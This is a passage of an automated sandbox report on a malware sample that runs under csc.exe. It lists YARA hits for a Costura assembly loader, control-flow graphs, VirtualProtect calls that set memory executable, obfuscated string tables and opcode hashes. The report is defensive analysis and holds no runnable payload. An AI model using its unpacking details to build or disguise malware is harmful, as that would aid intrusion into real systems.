                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                                      Imagebase:0xca0000
                                                                                                                      File size:2'141'552 bytes
                                                                                                                      MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3789474644.0000000009540000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3786417817.0000000006CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3786964807.0000000007E72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:false


                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:0.2%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:66.7%
                                                                                                                        Total number of Nodes:9
                                                                                                                        Total number of Limit Nodes:1
                                                                                                                        execution_graph 25861 409f24 25862 409f54 ExitProcess 25861->25862 25864 40813a 25865 40813c VirtualProtect 25864->25865 25867 4081a1 25865->25867 25868 408828 25867->25868 25870 4094b9 25867->25870 25878 4089ff 18 API calls 25868->25878 25879 4095cc 8 API calls 25870->25879

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$YQ$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-1402221123
                                                                                                                        • Opcode ID: 7c20f8dc98d7115db943d6b1e10bfc1683e3d64e3185a16b1407a21c0f57b41c
                                                                                                                        • Instruction ID: 552b3e37006ca7b93b7341b10d5ba12ce664671d15c095bbf474118e4d211da1
                                                                                                                        • Opcode Fuzzy Hash: 7c20f8dc98d7115db943d6b1e10bfc1683e3d64e3185a16b1407a21c0f57b41c
                                                                                                                        • Instruction Fuzzy Hash: 30E125A2C082649AF7208624DC45BEB7A79DF50314F0440FED94D662C1DABE5FC58BA7
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 4c1d08d73541cbc7a277f5de330505408b5612a8ebe57e9a427c239e2cab2788
                                                                                                                        • Instruction ID: a0810739b08e09db0114f26d69ccb1495e1e5597be628df8a29aa899d8e24c60
                                                                                                                        • Opcode Fuzzy Hash: 4c1d08d73541cbc7a277f5de330505408b5612a8ebe57e9a427c239e2cab2788
                                                                                                                        • Instruction Fuzzy Hash: 8EF123A2C042649AF7208624DC447FB7A78EF51310F1440FED94DA62C1E6BE4FD6CB66

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 7e582c5f3101599f140a86f8967673f103552689eeb40852df6de6cbbdcda19e
                                                                                                                        • Instruction ID: fe1b180f35ded295e356599168183658795d2bfc2890c1e042ad3a4d1c9d819f
                                                                                                                        • Opcode Fuzzy Hash: 7e582c5f3101599f140a86f8967673f103552689eeb40852df6de6cbbdcda19e
                                                                                                                        • Instruction Fuzzy Hash: D3F137E2D042649EF7208624EC44BE77A78EB51314F1440FED94DA62C0D6BE5FC68BA7

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 144 4074f5-407524 145 407535-407586 144->145 146 407526-407530 144->146 154 407594-4075c6 call 4075b5 145->154 155 407588 145->155 148 4075d0-4075d7 146->148 150 407619 148->150 151 4075d9-407631 148->151 150->150 161 4076d3-407714 call 407716 151->161 162 407637-407690 151->162 154->148 155->154 162->161 168 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 162->168 194 408828-408a77 call 4089ff 168->194 195 4094b9-4095cb call 4094db call 40950b call 4095cc 168->195 211 408a79-408ab5 194->211 212 408aba-408ae7 call 408ae8 194->212 226 409f60-409f62 ExitProcess 195->226 219 408e4f-408e56 211->219 212->219 222 408e58-408e94 219->222 223 408e99-408ecf call 408ed1 219->223 222->226 223->226
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 763e98e61c6b49b07462a2c8dbb8857cf064c3c576dc90e8bcb5013b44e6286e
                                                                                                                        • Instruction ID: f8ae071597d0369a0ea6e5a7ef278c1cd42b05d95af171ce00d2b1dc5b51714e
                                                                                                                        • Opcode Fuzzy Hash: 763e98e61c6b49b07462a2c8dbb8857cf064c3c576dc90e8bcb5013b44e6286e
                                                                                                                        • Instruction Fuzzy Hash: D2F146B2C082649AF7208624DC847EB7A79DF51314F1440FED94D662C1DABE1FC68B67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 230 407ce7-407d0a 231 407d0c-407d4a 230->231 232 407d4f-407d90 230->232 234 40816e-408822 VirtualProtect call 40838a call 4083a8 call 40841d 231->234 237 407d92-407dd0 232->237 238 407dd5-407e99 232->238 262 408828-408a77 call 4089ff 234->262 263 4094b9-4095cb call 4094db call 40950b call 4095cc 234->263 237->234 244 408162-408168 238->244 245 407e9f-407eb5 call 407eb6 238->245 244->234 245->244 279 408a79-408ab5 262->279 280 408aba-408ae7 call 408ae8 262->280 294 409f60-409f62 ExitProcess 263->294 287 408e4f-408e56 279->287 280->287 290 408e58-408e94 287->290 291 408e99-408ecf call 408ed1 287->291 290->294 291->294
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 026932607235a52f7d863d2866d8b306e01cc66e42a3e4510ad1a7c595773086
                                                                                                                        • Instruction ID: df8e3fcac33211f4c5b008abac8f8c68894361ab22a79a16978cd784f9a3db6b
                                                                                                                        • Opcode Fuzzy Hash: 026932607235a52f7d863d2866d8b306e01cc66e42a3e4510ad1a7c595773086
                                                                                                                        • Instruction Fuzzy Hash: BBF105B2D042649BF7208624DC84BEB7A79EF90310F1480FED94D67281D6BD5FC68B66

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: e8ceced950599952926a2a7048b19e50167d42c1a8fc9a1751870ae93f3295a2
                                                                                                                        • Instruction ID: b45db600def9cba6b152f9bae71686f50ffbe3404f9396e81384a605f94926e6
                                                                                                                        • Opcode Fuzzy Hash: e8ceced950599952926a2a7048b19e50167d42c1a8fc9a1751870ae93f3295a2
                                                                                                                        • Instruction Fuzzy Hash: 3DE146B2C042649AF7208624DC44BEB7A69DF51314F0440FED98D672C1DABE1FC68BA7

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 369 407f65-407f8f 371 407f95-407fa2 369->371 372 40801d-408068 369->372 371->372 373 407fa4-408018 call 407fbb 371->373 374 408079-4080ca call 408098 372->374 375 40806a-408074 372->375 392 407f78-40800d 373->392 388 4080d8-4080fd call 4080fe 374->388 389 4080cc-4080d6 374->389 377 408114-40811b 375->377 380 40815d 377->380 381 40811d-40815b 377->381 386 40816e-408822 VirtualProtect call 40838a call 4083a8 call 40841d 380->386 381->386 416 408828-408a77 call 4089ff 386->416 417 4094b9-4095cb call 4094db call 40950b call 4095cc 386->417 389->377 398 408016 392->398 399 40800f 392->399 398->372 399->392 433 408a79-408ab5 416->433 434 408aba-408ae7 call 408ae8 416->434 448 409f60-409f62 ExitProcess 417->448 441 408e4f-408e56 433->441 434->441 444 408e58-408e94 441->444 445 408e99-408ecf call 408ed1 441->445 444->448 445->448
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 2fe339eb59fc586c2937a91252676beb4543a3d4f9bdffa9c775f95e98139192
                                                                                                                        • Instruction ID: f40b09c2810a9fa6f02b2eec4802a077c4c1291dc3e09875bf3ed72bb553ef21
                                                                                                                        • Opcode Fuzzy Hash: 2fe339eb59fc586c2937a91252676beb4543a3d4f9bdffa9c775f95e98139192
                                                                                                                        • Instruction Fuzzy Hash: 8EE135B1C042649AF7208624DC447EB7A79DF51314F1440FED98DA62C1DABE0FC68B67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 452 406e30-406e4d 453 406e52-406ece call 406e68 452->453 459 406ed0-406ee0 453->459 460 406ee5-406eef 453->460 464 406f68-406f6f 459->464 462 406ef5-406f02 460->462 463 406dde-406e4d 460->463 462->463 465 406f08-406f1f call 406f1b 462->465 463->453 466 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 464->466 467 406fb4-406fcb call 406fd0 464->467 465->466 475 406f21-406f44 465->475 499 408828-408a77 call 4089ff 466->499 500 4094b9-4095cb call 4094db call 40950b call 4095cc 466->500 479 406f52 475->479 480 406f46-406f50 475->480 482 406f5c-406f62 479->482 480->482 482->464 516 408a79-408ab5 499->516 517 408aba-408ae7 call 408ae8 499->517 531 409f60-409f62 ExitProcess 500->531 524 408e4f-408e56 516->524 517->524 527 408e58-408e94 524->527 528 408e99-408ecf call 408ed1 524->528 527->531 528->531
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 0-3687113455
                                                                                                                        • Opcode ID: e76747aa6b57113d2716c669ea92c047467e31ea4db9a62e7ffb1e10252d0d64
                                                                                                                        • Instruction ID: 220cd9281a29cea94c4a91926213e167e5dbe57d70c329742c206d8b20fd43a8
                                                                                                                        • Opcode Fuzzy Hash: e76747aa6b57113d2716c669ea92c047467e31ea4db9a62e7ffb1e10252d0d64
                                                                                                                        • Instruction Fuzzy Hash: E1E125A2C042649AF7208624DC44BEB7A78EF50314F1440FED94DA62C1D6BE5FC6CBA7

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 535 406e40-406e4d 536 406e52-406ece call 406e68 535->536 542 406ed0-406ee0 536->542 543 406ee5-406eef 536->543 547 406f68-406f6f 542->547 545 406ef5-406f02 543->545 546 406dde-406e4d 543->546 545->546 548 406f08-406f1f call 406f1b 545->548 546->536 549 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 547->549 550 406fb4-406fcb call 406fd0 547->550 548->549 558 406f21-406f44 548->558 582 408828-408a77 call 4089ff 549->582 583 4094b9-4095cb call 4094db call 40950b call 4095cc 549->583 562 406f52 558->562 563 406f46-406f50 558->563 565 406f5c-406f62 562->565 563->565 565->547 599 408a79-408ab5 582->599 600 408aba-408ae7 call 408ae8 582->600 614 409f60-409f62 ExitProcess 583->614 607 408e4f-408e56 599->607 600->607 610 408e58-408e94 607->610 611 408e99-408ecf call 408ed1 607->611 610->614 611->614
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 0-3687113455
                                                                                                                        • Opcode ID: 38b9c65dbf6283e9cc1faf9955d89fe7368ed5d215a0d58d7d950dcf7ce02bd7
                                                                                                                        • Instruction ID: 922c944672f40ff5276d803d9d834a580e9c1310f30415da19b8596a71a819f2
                                                                                                                        • Opcode Fuzzy Hash: 38b9c65dbf6283e9cc1faf9955d89fe7368ed5d215a0d58d7d950dcf7ce02bd7
                                                                                                                        • Instruction Fuzzy Hash: 44E123A2C082649AF7208624DC44BEB7A78EF51314F1440FED94DA62C1D6BE5FC6CB67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 618 406e50-406e5d 619 406e60-406ece 618->619 622 406ed0-406ee0 619->622 623 406ee5-406eef 619->623 627 406f68-406f6f 622->627 625 406ef5-406f02 623->625 626 406dde-406e5d call 406e68 623->626 625->626 629 406f08-406f1f call 406f1b 625->629 626->619 630 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 627->630 631 406fb4-406fcb call 406fd0 627->631 629->630 641 406f21-406f44 629->641 665 408828-408a77 call 4089ff 630->665 666 4094b9-4095cb call 4094db call 40950b call 4095cc 630->666 645 406f52 641->645 646 406f46-406f50 641->646 648 406f5c-406f62 645->648 646->648 648->627 682 408a79-408ab5 665->682 683 408aba-408ae7 call 408ae8 665->683 697 409f60-409f62 ExitProcess 666->697 690 408e4f-408e56 682->690 683->690 693 408e58-408e94 690->693 694 408e99-408ecf call 408ed1 690->694 693->697 694->697
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: a1c9d9ecc7b5141984307abe64710c3eb2a70715d632bebb7b06ef5f539f95a0
                                                                                                                        • Instruction ID: f472c5bf6cce1d32c270796867ad13836725e5baa778bd72db952dc4fd989fbb
                                                                                                                        • Opcode Fuzzy Hash: a1c9d9ecc7b5141984307abe64710c3eb2a70715d632bebb7b06ef5f539f95a0
                                                                                                                        • Instruction Fuzzy Hash: B9E134A2C082649AF7208624DC44BEB7A78EF51314F1440FED94DA62C1D6BE5FC6CB67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 701 407500-407524 702 407535-407586 701->702 703 407526-407530 701->703 711 407594-4075c6 call 4075b5 702->711 712 407588 702->712 705 4075d0-4075d7 703->705 707 407619 705->707 708 4075d9-407631 705->708 707->707 718 4076d3-407714 call 407716 708->718 719 407637-407690 708->719 711->705 712->711 719->718 725 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 719->725 751 408828-408a77 call 4089ff 725->751 752 4094b9-4095cb call 4094db call 40950b call 4095cc 725->752 768 408a79-408ab5 751->768 769 408aba-408ae7 call 408ae8 751->769 783 409f60-409f62 ExitProcess 752->783 776 408e4f-408e56 768->776 769->776 779 408e58-408e94 776->779 780 408e99-408ecf call 408ed1 776->780 779->783 780->783
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 636b56e18b7d4412ab0a9b9136e29d628baca83dc62632dedea95a0b5513a5e3
                                                                                                                        • Instruction ID: 08101456153ba46f1365cff4e30746e8e286d4fed58f6373a9dfc3cd762e9e30
                                                                                                                        • Opcode Fuzzy Hash: 636b56e18b7d4412ab0a9b9136e29d628baca83dc62632dedea95a0b5513a5e3
                                                                                                                        • Instruction Fuzzy Hash: 32E133B2C082649AF7208624DC44BEB7A69DF51314F1440FED94D662C1DABE1FC6CB67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 787 407c35-407c4f 789 407c51-407c8f 787->789 790 407c94-407ca6 787->790 794 40816e-408822 VirtualProtect call 40838a call 4083a8 call 40841d 789->794 792 407ca8-407cb4 790->792 793 407cb9-407d0a call 407ce7 790->793 792->794 799 407d0c-407d4a 793->799 800 407d4f-407d90 793->800 827 408828-408a77 call 4089ff 794->827 828 4094b9-4095cb call 4094db call 40950b call 4095cc 794->828 799->794 805 407d92-407dd0 800->805 806 407dd5-407e99 800->806 805->794 813 408162-408168 806->813 814 407e9f-407eb5 call 407eb6 806->814 813->794 814->813 844 408a79-408ab5 827->844 845 408aba-408ae7 call 408ae8 827->845 859 409f60-409f62 ExitProcess 828->859 852 408e4f-408e56 844->852 845->852 855 408e58-408e94 852->855 856 408e99-408ecf call 408ed1 852->856 855->859 856->859
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: d8c32f27cfc5d901a96705040dc726f393045433d68751bcca934b27c13b3a32
                                                                                                                        • Instruction ID: cf000f9f2d6c84c8d3ce0dac07b7f877c0778feaaefee545d6c19c651e8d1ed7
                                                                                                                        • Opcode Fuzzy Hash: d8c32f27cfc5d901a96705040dc726f393045433d68751bcca934b27c13b3a32
                                                                                                                        • Instruction Fuzzy Hash: F0E114B2D082689AF7208624DC44BEB7A68EF51314F1440FED94D67281D6BE1FC58BA7

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 4a0411652cf470597e9e485effa7868a9c99ab21ceb968b5f09b91b25baa5950
                                                                                                                        • Instruction ID: ea58bfbc0dd8c397f22414f43d59e966c6f640d547af9d12bb140abd4150adc7
                                                                                                                        • Opcode Fuzzy Hash: 4a0411652cf470597e9e485effa7868a9c99ab21ceb968b5f09b91b25baa5950
                                                                                                                        • Instruction Fuzzy Hash: 08D123B2D082649AF7208624DC44BEB7A69DF50314F1440FED94D662C1DABE1FC68B67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 936 4075c0-4075d7 938 407619 936->938 939 4075d9-407631 936->939 938->938 944 4076d3-407714 call 407716 939->944 945 407637-407690 939->945 945->944 950 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 945->950 976 408828-408a77 call 4089ff 950->976 977 4094b9-4095cb call 4094db call 40950b call 4095cc 950->977 993 408a79-408ab5 976->993 994 408aba-408ae7 call 408ae8 976->994 1008 409f60-409f62 ExitProcess 977->1008 1001 408e4f-408e56 993->1001 994->1001 1004 408e58-408e94 1001->1004 1005 408e99-408ecf call 408ed1 1001->1005 1004->1008 1005->1008
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 8efa2fc18f11feecf9e72f35dc03a98d40f6573ae9cc8823b81c0489b360da7c
                                                                                                                        • Instruction ID: c3c9fe27aa97eefe4607321597f7646c91d95a2a7d095fabcd85beefab367c0e
                                                                                                                        • Opcode Fuzzy Hash: 8efa2fc18f11feecf9e72f35dc03a98d40f6573ae9cc8823b81c0489b360da7c
                                                                                                                        • Instruction Fuzzy Hash: AAD135B2C082649AF7208624DC44BEB7A69DF51314F1440FED94D662C1DABE1FC6CB67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1080 4075e0-407631 1083 4076d3-407714 call 407716 1080->1083 1084 407637-407690 1080->1084 1084->1083 1089 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 1084->1089 1115 408828-408a77 call 4089ff 1089->1115 1116 4094b9-4095cb call 4094db call 40950b call 4095cc 1089->1116 1132 408a79-408ab5 1115->1132 1133 408aba-408ae7 call 408ae8 1115->1133 1147 409f60-409f62 ExitProcess 1116->1147 1140 408e4f-408e56 1132->1140 1133->1140 1143 408e58-408e94 1140->1143 1144 408e99-408ecf call 408ed1 1140->1144 1143->1147 1144->1147
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 48533f2cbce7cdaf1ed70220ab39ca012e3d16fecf106e9b81853bb4f7082912
                                                                                                                        • Instruction ID: ba5505202cf962745bbe92fa0db4f2cdf567307ff8a9c8f7b4a3d42c12a6f098
                                                                                                                        • Opcode Fuzzy Hash: 48533f2cbce7cdaf1ed70220ab39ca012e3d16fecf106e9b81853bb4f7082912
                                                                                                                        • Instruction Fuzzy Hash: 6ED134B2C082649AF7208624DC447EB7A69DF51314F0840FED98D662C1DABE1FC6CB67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1012 406f0b-406f1f 1013 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 1012->1013 1014 406f21-406f44 1012->1014 1044 408828-408a77 call 4089ff 1013->1044 1045 4094b9-4095cb call 4094db call 40950b call 4095cc 1013->1045 1017 406f52 1014->1017 1018 406f46-406f50 1014->1018 1020 406f5c-406f6f 1017->1020 1018->1020 1020->1013 1024 406fb4-406fcb call 406fd0 1020->1024 1061 408a79-408ab5 1044->1061 1062 408aba-408ae7 call 408ae8 1044->1062 1076 409f60-409f62 ExitProcess 1045->1076 1069 408e4f-408e56 1061->1069 1062->1069 1072 408e58-408e94 1069->1072 1073 408e99-408ecf call 408ed1 1069->1073 1072->1076 1073->1076
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
